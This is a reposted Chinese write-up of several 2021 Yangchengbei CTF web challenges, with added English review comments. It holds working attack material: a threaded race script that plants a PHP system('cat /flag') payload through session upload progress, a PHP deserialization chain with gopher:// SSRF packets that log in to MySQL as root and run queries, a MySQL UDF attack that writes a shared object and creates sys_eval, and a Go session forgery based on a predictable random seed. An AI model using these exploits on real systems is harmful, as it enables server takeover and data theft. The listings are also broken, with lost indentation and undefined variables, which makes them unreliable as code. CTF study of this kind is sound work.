安全-2021羊城杯WP(部分)
Posted 小狐狸FM
前言
此文章来自EDI安全公众号文章,并非原创,如有侵权可联系删除
Web
web1 only 4
# Worker loop from the write-up's solver for "only 4": it keeps POSTing a
# multipart upload through the session object `s` until `stop_threads` is set
# or a response contains the marker string 'flag'.
# NOTE(review): as transcribed, the listing has lost its indentation and two
# string literals are hard-wrapped across lines; `io`, `stop_threads` and `r`
# are not defined in the visible lines, so this is an excerpt rather than a
# runnable script.
def start_flag(s):
global stop_threads
while True:
if stop_threads:
break
# 50 KiB of filler bytes used as the uploaded file body.
f = io.BytesIO(b'a' * 1024 * 50)
# `gwht` names the PHP session file that belongs to PHPSESSID=1 (see the
# Cookie header below); presumably the challenge page includes whatever path
# it is given, and `ycb` is a second challenge parameter -- confirm both
# against the challenge source.
url = 'http://192.168.41.134:8000/?
gwht=/var/lib/php5/sess_1&ycb=http://127.0.0.1'
headers = {'Cookie': 'PHPSESSID=1', }
# PHP_SESSION_UPLOAD_PROGRESS is the default field name of PHP's
# session.upload_progress feature: while an upload is in flight PHP records
# progress data, including this field's value, in the session file. The value
# here is a short PHP snippet that reads /flag and echoes the marker.
# Defensive reading: the technique needs both a request-controlled include
# path and upload-progress tracking; never pass request parameters to
# include/require, and set session.upload_progress.enabled=Off where the
# feature is not used.
data = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat
/flag');echo 'flag';?>"} # Payload
files = {"file": ('1.txt', f)}
rest = s.post(url, headers=headers, data=data, files=files)
# NOTE(review): this test reads `r`, but the response above is bound to `rest`.
if 'flag' in r.text:
print(rest.text)
exit()
# Entry point: opens one requests session, starts worker threads and then
# joins every thread collected in `thread_list`.
# Several workers are used presumably because the upload-progress entry exists
# in the session file only briefly (PHP removes it when the upload completes
# if session.upload_progress.cleanup is On) -- confirm against the target's
# configuration.
# NOTE(review): `run`, `s`, `thread_num` and `thread_list` are not defined in
# the visible lines, and `thread_num` is not changed inside the loop shown; the
# listing appears to be truncated or garbled by the page extraction.
if __name__ == '__main__':
with requests.session() as session:
while thread_num:
thre = threading.Thread(target=run, args=(s,))
thre.start()
thread_list.append(thre)
for t in thread_list:
t.join()
EasyCurl
扫描得到文件 下载后发现sql
sql里有密码
访问admin.php 发送数据
<?php
/**
 * Minimal stand-in for the challenge's User class, used only to produce a
 * serialized object whose single property `username` is "admin".
 *
 * NOTE(review): the write-up sends the resulting string to admin.php, which
 * presumably feeds it to unserialize(); when request data reaches
 * unserialize(), the client decides the class and every property value, so a
 * plain data format (e.g. JSON) or the `allowed_classes` option is the safer
 * server-side choice.
 */
class User
{
    public function __construct()
    {
        // Assigned dynamically (no declared property), as in the original listing.
        $this->username = "admin";
    }
}
// Build the object, serialize it, and print the wire form.
$adminUser = new User();
$wire = serialize($adminUser);
echo $wire;
// Prints: O:4:"User":1:{s:8:"username";s:5:"admin";}
可以看到返回了admin
根据备份 挖掘链子
<?php
/**
 * Payload-side stand-in for the challenge's file_request class: the
 * constructor only sets $this->url, the value carried inside the serialized
 * chain.
 *
 * Every URL below is gopher://127.0.0.1:3306/ followed by percent-encoded
 * bytes: a MySQL client login for user "root" using mysql_native_password
 * with an empty password, then one query packet. The commented-out variants
 * are earlier stages (schema and table enumeration, CREATE FUNCTION sys_eval,
 * directory listings); the one uncommented assignment runs
 * sys_eval("/readflag").
 *
 * NOTE(review): the page extraction hard-wrapped the long lines, so
 * continuation lines belong to the preceding // comment or string literal and
 * the listing does not parse as shown.
 *
 * Defensive reading: the chain depends on the server-side class (presumably)
 * fetching $url with a client that accepts gopher://, and on MySQL accepting
 * a password-less root login from localhost. Limiting the fetcher to
 * http/https (e.g. CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS), refusing
 * loopback and internal destinations, and requiring a password on every
 * database account each break it.
 */
class file_request{
public function __construct()
{
// SELECT concat(schema_name) from information_schema.schemata
//gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%
6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6
f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d
%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%
65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%3
8%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%43%00
%00%00%03%53%45%4c%45%43%54%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%73%63%
68%65%6d%61%5f%6e%61%6d%65%29%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6
f%6e%5f%73%63%68%65%6d%61%2e%73%63%68%65%6d%61%74%61%3b%01%00%00%00%01
// O:4:"User":1:{s:8:"username";O:12:"cache_parser":3:
{s:4:"user";O:4:"User":2:
{s:8:"username";s:3:"asd";s:10:"session_id";s:3:"asd";}s:6:"logger";r:2;s:15
:"default_handler";O:12:"file_request":1:
{s:3:"url";s:820:"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00
%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%
72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%7
2%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d
%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%
69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%6
6%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d
%79%73%71%6c%59%00%00%00%03%53%45%4c%45%43%54%20%67%72%6f%75%70%5f%63%6f%6e%
63%61%74%28%74%61%62%6c%65%5f%6e%61%6d%65%29%20%66%72%6f%6d%20%69%6e%66%6f%7
2%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72
%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%27%63%74%66%27%3b%01%00%00%00%
01";}}}
// $this->url =
"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%0
0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00
%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%
6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6
d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76
%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%
38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%3e%0
0%00%00%03%63%72%65%61%74%65%20%66%75%6e%63%74%69%6f%6e%20%73%79%73%5f%65%76
%61%6c%20%72%65%74%75%72%6e%73%20%73%74%72%69%6e%67%20%73%6f%6e%61%6d%65%20%
27%6d%79%73%71%6c%75%64%66%2e%73%6f%27%3b%01%00%00%00%01"
// $this->url =
"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%0
0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00
%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%
6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6
d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76
%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%
38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%23%0
0%00%00%03%73%65%6c%65%63%74%20%73%79%73%5f%65%76%61%6c%28%22%6c%73%20%2d%6c
%20%2f%3b%63%61%74%20%2f%2a%22%29%3b%01%00%00%00%01";
// $this->url =
"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%0
0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00
%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%
6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6
d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76
%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%
38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1c%0
0%00%00%03%73%65%6c%65%63%74%20%73%79%73%5f%65%76%61%6c%28%22%6c%73%20%2d%6c
%20%2f%22%29%3b%01%00%00%00%01"
// The only assignment left uncommented: the query packet is select sys_eval("/readflag");
$this->url =
"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%0
0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00
%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%
6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6
d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76
%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%
38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1e%0
0%00%00%03%73%65%6c%65%63%74%20%73%79%73%5f%65%76%61%6c%28%22%2f%72%65%61%64
%66%6c%61%67%22%29%3b%01%00%00%00%01";
}
}
/**
 * Payload-side copy of the challenge's cache_parser class; the constructor
 * fills the three properties that appear in the serialized chain (user,
 * logger, default_handler). Assignment order is kept because PHP serializes
 * properties in the order they were set.
 *
 * NOTE(review): what the server-side class does with these properties is not
 * shown on this page; the chain presumably works because the application
 * unserializes request data, which lets the client choose default_handler.
 */
class cache_parser{
function __construct(){
// User(1) takes the empty branch of User::__construct, so no nested cache_parser is built here.
$this->user = new User(1);
$this->user->username = "asd";
$this->user->session_id = "asd";
// Points logger back at this same object; the serialized sample quoted in
// this write-up shows the property as the back-reference r:2.
$this->logger = &$this;
// Carries the URL set in file_request's constructor.
$this->default_handler = new file_request();
// Commented-out alternative from the write-up: a function-name string instead of an object.
// $this->default_handler = "phpinfo"; // execute
}
}
/**
 * Outer object of the serialized chain.
 *
 * Constructed with a value loosely equal to 1 it stays empty (used for the
 * inner `user` property); with any other value its `username` property holds
 * a new cache_parser, which is where the nested objects hang.
 */
class User
{
    public function __construct($a)
    {
        // Loose comparison kept as in the original listing.
        if ($a == 1) {
            return;
        }

        $this->username = new cache_parser();
    }
}
// Any argument other than 1 makes User build the nested cache_parser chain;
// the serialized string is what the write-up submits to the target.
$chain = new User(2);
$wire = serialize($chain);
echo $wire;
mysql是空密码,用ssrf打一下(即上面的gopher://127.0.0.1:3306载荷)
读取数据库无果
试了一下mysql扩展
catmysqludf.txt
-- Lists the server variables whose names contain "plugin"; this includes
-- plugin_dir, the directory MySQL loads UDF shared objects from.
show variables like '%plugin%';
-- Writes hex-decoded bytes to a file in the plugin directory. The literal
-- starts with 7F454C46 (the ELF magic); most of the hex is elided in this copy
-- of the page. Defensive reading: INTO DUMPFILE needs the FILE privilege and
-- is refused when secure_file_priv does not allow the target directory, and
-- the plugin directory should not be writable by the mysqld account.
select
unhex('7F454C4602010100000000000000000003003E0001000000800A00000000000040000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') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
-- Registers a function named sys_eval backed by the shared object written above.
create function sys_eval returns string soname 'mysqludf.so';
-- Calls the new function with the path of the challenge's /readflag binary.
select sys_eval("/readflag");
写出mysql扩展
创建函数
create function sys_eval returns string soname 'mysqludf.so';
列目录 发现readflag
/readflag获取flag
Checkin_Go
关键点在这里 /game
可以知道能够购买flag,但是钱不够;发现服务端设置了一个名为o的cookie
看着像base64 解码看看 去掉数字和那个杠继续
chekNowMoney这个值从代码里可以看到是cookie里一定有的,并且这个值就是加密后20w的值。之后猜测可能是session伪造,但这个是随机生成的。查了相关资料发现,Go里面的math/rand(原文写作math/seed)如果没有设定种子,默认种子为1,这就代表着随机数是可预测、可复现的,那我们伪造session就行了,伪造一个钱。(注:Go 1.20之前math/rand的全局生成器默认种子固定为1;会话密钥这类秘密值应当用crypto/rand生成,而不是math/rand。)